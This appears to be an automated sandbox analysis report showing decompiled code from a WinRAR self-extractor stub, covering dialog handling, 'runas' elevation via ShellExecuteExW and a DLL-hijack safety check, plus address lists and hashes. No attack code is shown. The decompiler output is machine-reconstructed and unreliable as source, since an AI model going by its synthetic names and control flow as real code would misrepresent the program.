							__eflags =  *0x1a8451;
							if( *0x1a8451 == 0) {
								__eflags =  *0x1a8452;
								if( *0x1a8452 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0x1a845c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0x1935b4);
									}
									SetFocus(_t313);
									__eflags =  *0x1a9468;
									if( *0x1a9468 == 0) {
										_t314 = 0x800;
										E0016FE56(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E0017CAD9(_t287, _t320 - 0x1174, 0x800);
										E0016400A(_t320 - 0x429c, 0x880, E0016DDD1(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x429c);
										_push(0);
										E0017CB5A();
									} else {
										_push(E0016DDD1(_t287, 0xba));
										_push(0);
										E0017CB5A();
										_t314 = 0x800;
									}
									__eflags =  *0x1aa471;
									if( *0x1aa471 == 0) {
										E0017D1F2(_t320 - 0x2174);
									}
									_push(0);
									_push(_t320 - 0x2174);
									 *(_t320 - 0xe) = 0;
									_t166 = E0016A04F(0, _t320);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E0017A322(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0x1aa471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0x1a8454 = _t279;
													E001612E6(_t304, 0x67, 0);
													E001612E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E0016DDD1(_t287, 0xe6)); // executed
													E001612E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0x1935b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x1a8438);
													_push(_t304);
													E0017BDF5(_t302);
													_push(2);
													_push( *0x1a8438);
													_push(_t304);
													E0017BDF5(_t302);
													_push(0x1bdc90);
													_push(_t304);
													 *0x1c0cb4 = _t279; // executed
													E0017D0F5(_t287, __eflags); // executed
													_push(6);
													_push( *0x1a8438);
													 *0x1c0cb4 = 0;
													_push(_t304);
													E0017BDF5(_t302);
													__eflags =  *0x1a8450;
													if( *0x1a8450 == 0) {
														__eflags =  *0x1a845c;
														if( *0x1a845c == 0) {
															__eflags =  *0x1beca4;
															if( *0x1beca4 == 0) {
																_push(4);
																_push( *0x1a8438);
																_push(_t304); // executed
																E0017BDF5(_t302); // executed
															}
														}
													}
													E001612C8(_t304, _t279, _t279);
													 *0x1a8454 =  *0x1a8454 & 0x00000000;
													__eflags =  *0x1a8454;
													_t182 =  *0x1a8450; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E0016DDD1(_t287, 0x9a));
														E0016400A(_t320 - 0x569c, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E00166FC6(0x1a0f50, _t279);
														E00179F35(_t304, _t320 - 0x569c, E0016DDD1(0x1a0f50, 0x96), 0x30);
														 *0x1a845c =  *0x1a845c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0x1ac472;
												E0016EB3A(0x1ac472, _t320 - 0x174, 0x80);
												_push(0x1ab472);
												E0016400A(_t320 - 0x11cb4, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb4;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0x1a8468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0x1b6b80 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0016FE56(0x1b6b82, _t231, 0x2000);
													}
													E0017AB2E(_t287, 0x1bab82, 7);
													E0017AB2E(_t287, 0x1bbb82, 2);
													E0017AB2E(_t287, 0x1bcb82, 0x10);
													 *0x1bdc83 = _t279;
													_t287 = 0x1bdb82;
													E0016ECAD(_t279, 0x1bdb82, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0017F4B0(_t238, 0x1b6b80, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E0016ECF8(_t320 - 0x174, 0x80);
												E0016ECF8(_t320 - 0x11cb4, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0x1c20a8( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x1beca4 =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E0016400A(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E00169619(_t320 - 0x319c);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E0016971E(_t320 - 0x319c);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00169653(_t320 - 0x319c, _t314); // executed
											_t287 =  *0x1aa471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0x1a8450 = 1;
									L75:
									__eflags =  *0x1a845c;
									if( *0x1a845c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x1a8451 = _t279;
									SetDlgItemTextW(_t304, _t279, E0016DDD1(_t287, 0x90));
									_t292 =  *0x1a0f50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0016DDD1(_t292, 0x96);
									E00179F35(_t304, E0016DDD1(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0x1a8452;
							if( *0x1a8452 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x1c0cb4;
						if( *0x1c0cb4 == 0) {
							goto L23;
						} else {
							__eflags =  *0x1c0cb5;
							_t256 = _t149 & 0xffffff00 |  *0x1c0cb5 == 0x00000000;
							__eflags = _t256;
							 *0x1c0cb5 = _t256;
							_t257 = E0016DDD1((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0x1c0cb5;
								if( *0x1c0cb5 == 0) {
									goto L125;
								}
								__eflags =  *0x1a8450;
								if( *0x1a8450 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0x1a8454;
						 *0x1a8450 = 1;
						if( *0x1a8454 == 0) {
							goto L12;
						}
						__eflags =  *0x1a845c;
						if( *0x1a845c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E00161241(_t304, E0016DDD1(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x0017aee0
0x0017aee0
0x0017aee5
0x0017aeef
0x0017aef5
0x0017aef9
0x0017aefd
0x0017af16
0x0017af20
0x0017af20
0x0017af26
0x0017b5cb
0x0017b5cc
0x0017b5d1
0x0017b5d8
0x0017b5d9
0x0017b5df
0x0017b5e5
0x0017b5e7
0x0017b5f1
0x0017b5f1
0x0017b5f7
0x0017b5fc
0x0017b5fe
0x0017b60b
0x0017b60b
0x0017b614
0x0017b627
0x0017b62a
0x0017b63c
0x0017b644
0x0017b64a
0x0017b652
0x0017b654
0x0017b657
0x0017b65c
0x0017b65e
0x0017b65e
0x0017b666
0x0017b66d
0x0017b672
0x0017b677
0x0017b67c
0x0017b681
0x0017b682
0x0017b689
0x0017b68e
0x0017b690
0x0017b692
0x0017b692
0x0017b698
0x0017b69f
0x0017b6a1
0x0017b6a3
0x0017b6a9
0x0017b6aa
0x0017b6aa
0x0017b6af
0x0017b6b6
0x0017b6c6
0x0017b6d9
0x0017b6d9
0x0017b6df
0x0017b6e6
0x0017b797
0x0017b797
0x0017b79e
0x0017b847
0x0017b847
0x0017b84e
0x0017b853
0x0017b853
0x0017b859
0x0017b860
0x0017b867
0x0017b871
0x0017b871
0x0017b876
0x0017b87b
0x0017b87d
0x0017b87f
0x0017b886
0x0017b888
0x0017b88a
0x0017b88b
0x0017b890
0x0017b891
0x0017b893
0x0017b89d
0x0017b895
0x0017b895
0x0017b895
0x0017b893
0x0017b886
0x0017b8a3
0x0017b8aa
0x0017b8b9
0x0017b8b9
0x00000000
0x0017b8aa
0x0017b7a4
0x0017b7ab
0x00000000
0x00000000
0x0017b7b1
0x0017b7b8
0x00000000
0x00000000
0x0017b7be
0x0017b7c0
0x0017b7c5
0x0017b7cc
0x0017b7cc
0x0017b7d2
0x0017b7dd
0x0017b7dd
0x0017b7e3
0x0017b7ee
0x0017b7ff
0x0017b817
0x00000000
0x0017b817
0x0017b7e5
0x0017b7ec
0x00000000
0x00000000
0x00000000
0x0017b7ec
0x0017b7d4
0x0017b7db
0x00000000
0x00000000
0x00000000
0x0017b81c
0x0017b81c
0x0017b81d
0x0017b81d
0x0017b825
0x0017b83f
0x0017b844
0x00000000
0x0017b6ec
0x0017b6ec
0x0017b6ee
0x0017b6f4
0x0017b6f5
0x0017b6fa
0x0017b6ff
0x0017b701
0x0017b703
0x0017b70a
0x0017b70c
0x0017b720
0x0017b72b
0x0017b730
0x0017b730
0x0017b70a
0x0017b731
0x0017b737
0x0017b78a
0x0017b78a
0x0017b78b
0x0017b791
0x0017b792
0x00000000
0x0017b739
0x0017b73a
0x0017b740
0x0017b746
0x00000000
0x00000000
0x0017b748
0x0017b74f
0x00000000
0x00000000
0x0017b751
0x0017b753
0x0017b759
0x0017b75a
0x0017b75f
0x0017b766
0x00000000
0x00000000
0x0017b77c
0x0017b782
0x0017b784
0x0017b06b
0x0017b06b
0x0017b071
0x0017b071
0x0017af96
0x0017af97
0x0017b8bf
0x0017b8bf
0x0017b8c1
0x0017b8c7
0x0017b8d1
0x0017b8d1
0x00000000
0x0017b784
0x0017b737
0x0017b6e6
0x0017af2c
0x0017af2f
0x0017af43
0x0017af43
0x00000000
0x0017af43
0x0017af34
0x0017af34
0x0017af37
0x0017afa2
0x0017afa9
0x0017b041
0x0017b050
0x0017b056
0x0017b05d
0x0017b077
0x0017b07e
0x0017b09a
0x0017b09c
0x0017b0a2
0x0017b0ad
0x0017b0bf
0x0017b0bf
0x0017b0c6
0x0017b0cc
0x0017b0d3
0x0017b0ed
0x0017b101
0x0017b10e
0x0017b131
0x0017b136
0x0017b13f
0x0017b140
0x0017b141
0x0017b0d5
0x0017b0df
0x0017b0e0
0x0017b0e1
0x0017b0e6
0x0017b0e6
0x0017b146
0x0017b14d
0x0017b156
0x0017b156
0x0017b15b
0x0017b164
0x0017b165
0x0017b168
0x0017b16f
0x0017b170
0x0017b172
0x0017b189
0x0017b195
0x0017b197
0x0017b19a
0x0017b19c
0x0017b1b3
0x0017b1b3
0x0017b1b6
0x0017b1b6
0x0017b1bc
0x0017b1be
0x0017b22d
0x0017b22d
0x0017b231
0x0017b471
0x0017b477
0x0017b481
0x0017b493
0x0017b49d
0x0017b4aa
0x0017b4b9
0x0017b4bb
0x0017b4bd
0x0017b4c8
0x0017b4c8
0x0017b4d1
0x0017b4d1
0x0017b4d7
0x0017b4d9
0x0017b4df
0x0017b4e0
0x0017b4e5
0x0017b4e7
0x0017b4ed
0x0017b4ee
0x0017b4f3
0x0017b4f8
0x0017b4f9
0x0017b4ff
0x0017b504
0x0017b506
0x0017b50c
0x0017b513
0x0017b514
0x0017b519
0x0017b520
0x0017b522
0x0017b529
0x0017b52b
0x0017b532
0x0017b534
0x0017b536
0x0017b53c
0x0017b53d
0x0017b53d
0x0017b532
0x0017b529
0x0017b545
0x0017b54a
0x0017b54a
0x0017b551
0x00000000
0x0017b551
0x0017b237
0x0017b23e
0x0017b23e
0x0017b241
0x0017b241
0x0017b243
0x0017b247
0x0017b249
0x0017b407
0x0017b407
0x0017b40b
0x0017b41b
0x0017b434
0x0017b442
0x0017b45c
0x0017b461
0x0017b461
0x0017af94
0x0017af94
0x00000000
0x0017af94
0x0017b259
0x0017b26a
0x0017b270
0x0017b275
0x0017b292
0x0017b297
0x0017b29a
0x0017b2a7
0x0017b2ae
0x0017b2b7
0x0017b2cf
0x0017b2d2
0x0017b2d9
0x0017b2dc
0x0017b2df
0x0017b2ec
0x0017b2ee
0x0017b2f1
0x0017b2f3
0x0017b37e
0x0017b2f9
0x0017b2f9
0x0017b300
0x0017b306
0x0017b308
0x0017b315
0x0017b315
0x0017b321
0x0017b32d
0x0017b339
0x0017b344
0x0017b34b
0x0017b350
0x0017b36e
0x0017b371
0x0017b376
0x0017b376
0x0017b385
0x0017b399
0x0017b3aa
0x0017b3af
0x0017b3b1
0x0017b3eb
0x0017b3ee
0x00000000
0x0017b3b3
0x0017b3bb
0x0017b3c1
0x0017b3c1
0x0017b3c1
0x0017b3c5
0x0017b3c8
0x0017b3c8
0x0017b3cb
0x00000000
0x00000000
0x0017b3cf
0x0017b3d8
0x0017b3d9
0x0017b3dc
0x0017b3df
0x00000000
0x00000000
0x00000000
0x0017b3df
0x0017b3e4
0x0017b3f1
0x0017b3f1
0x0017b3f5
0x0017b3f8
0x0017b401
0x0017b401
0x00000000
0x0017b3f5
0x0017b3b1
0x0017b1c0
0x0017b1c2
0x00000000
0x00000000
0x0017b1d8
0x0017b1dd
0x0017b1e6
0x0017b1eb
0x0017b1f5
0x0017b1f7
0x0017b1fe
0x0017b203
0x0017b206
0x0017b208
0x0017b20a
0x0017b210
0x0017b213
0x0017b215
0x0017b215
0x0017b213
0x0017b218
0x0017b218
0x0017b218
0x0017b222
0x0017b227
0x00000000
0x0017b227
0x0017b19e
0x0017b1a4
0x0017b1a7
0x0017b1aa
0x00000000
0x00000000
0x0017b1ac
0x0017b1ae
0x00000000
0x0017b174
0x0017b174
0x0017b17a
0x0017b17d
0x0017b184
0x0017b186
0x00000000
0x0017b186
0x0017b17f
0x0017b182
0x00000000
0x00000000
0x00000000
0x0017b182
0x0017b080
0x0017b082
0x0017b083
0x0017b085
0x0017b556
0x0017b556
0x0017b55d
0x00000000
0x00000000
0x0017b563
0x0017b565
0x00000000
0x00000000
0x0017b570
0x0017b57e
0x0017b584
0x0017b58a
0x0017b58d
0x0017b598
0x0017b5a2
0x0017b5a2
0x0017b5a7
0x0017b5aa
0x0017b58f
0x0017b58f
0x0017b58f
0x0017b5b3
0x0017b5c1
0x00000000
0x0017b5c1
0x0017b07e
0x0017b061
0x0017b062
0x0017b069
0x00000000
0x00000000
0x00000000
0x0017b069
0x0017afaf
0x0017afb6
0x00000000
0x0017afbc
0x0017afbc
0x0017afc3
0x0017afc8
0x0017afca
0x0017afd9
0x0017afe1
0x0017afe4
0x0017b033
0x0017b033
0x0017b03a
0x0017b03c
0x0017b03c
0x0017afec
0x0017aff3
0x00000000
0x00000000
0x0017b002
0x0017b008
0x0017b00a
0x00000000
0x0017b010
0x0017b015
0x0017b01b
0x0017b01d
0x0017b023
0x0017b02d
0x0017b02d
0x00000000
0x0017b01d
0x0017b00a
0x00000000
0x0017b033
0x0017afb6
0x0017af39
0x0017af39
0x0017af3c
0x0017af77
0x0017af78
0x0017af7f
0x0017af85
0x00000000
0x00000000
0x0017af87
0x0017af8e
0x00000000
0x00000000
0x00000000
0x0017af8e
0x0017af3e
0x0017af41
0x0017af5a
0x0017af5f
0x0017af61
0x0017af6d
0x0017af6d
0x00000000
0x0017af61
0x00000000
0x0017af41
0x0017af18
0x0017af1a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0017AEE5

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

Strings

STARTDLG, xrefs: 0017AF04
-el -s2 "-d%s" "-sp%s", xrefs: 0017B281
"%s"%s, xrefs: 0017B423
winrarsfxmappingfile.tmp, xrefs: 0017B2BC
__tmp_rar_sfx_access_check_%u, xrefs: 0017B1CB
<, xrefs: 0017B29A
LICENSEDLG, xrefs: 0017B771
C:\Users\user\AppData\Roaming, xrefs: 0017B2DF
@, xrefs: 0017B2A7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Roaming$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3930412803
Opcode ID: c6f0f3d28d2fe60266f94b85e2ebff67d732e1b55e13db6cf330992b37bd4913
Instruction ID: 60ebca01b7a07b8064b28c89ff38943fe34245ee352d5072ffd2ed069c8e531b
Opcode Fuzzy Hash: c6f0f3d28d2fe60266f94b85e2ebff67d732e1b55e13db6cf330992b37bd4913
Instruction Fuzzy Hash: 20420671948244BFEB25ABB0DC8AFBE7B7CEB16704F448155F209A68D1CB744D84CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001700CF, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001700CF(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0017E360();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0x19e080; // 0x193b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E0016FE56( &_a9156, E0016BC85(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E0016ACF5() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00170085( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E0016BCFB(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E0016BCCF(_t234,  &_a764);
										if(E0016ACF5() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E0016400A( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E001835B3( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00170085(L"dwmapi.dll");
											E00170085(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E0016400A( &_a4848, 0x864, E0016DDD1(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00179F35(0,  &_a4844, E0016DDD1(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E0016BCFB(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E001870DD(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E0016FBD8(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00170085( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0x193260( ~(_t180 & 0x000000ff) & 0x001935b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0x193260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}

0x001700d4
0x001700da
0x001700e2
0x001700ea
0x001700ee
0x00170154
0x00170154
0x00170159
0x0017015c
0x00170164
0x00170169
0x00170171
0x0017017c
0x00170184
0x0017018c
0x00170194
0x0017019c
0x001701a4
0x001701ac
0x001701b4
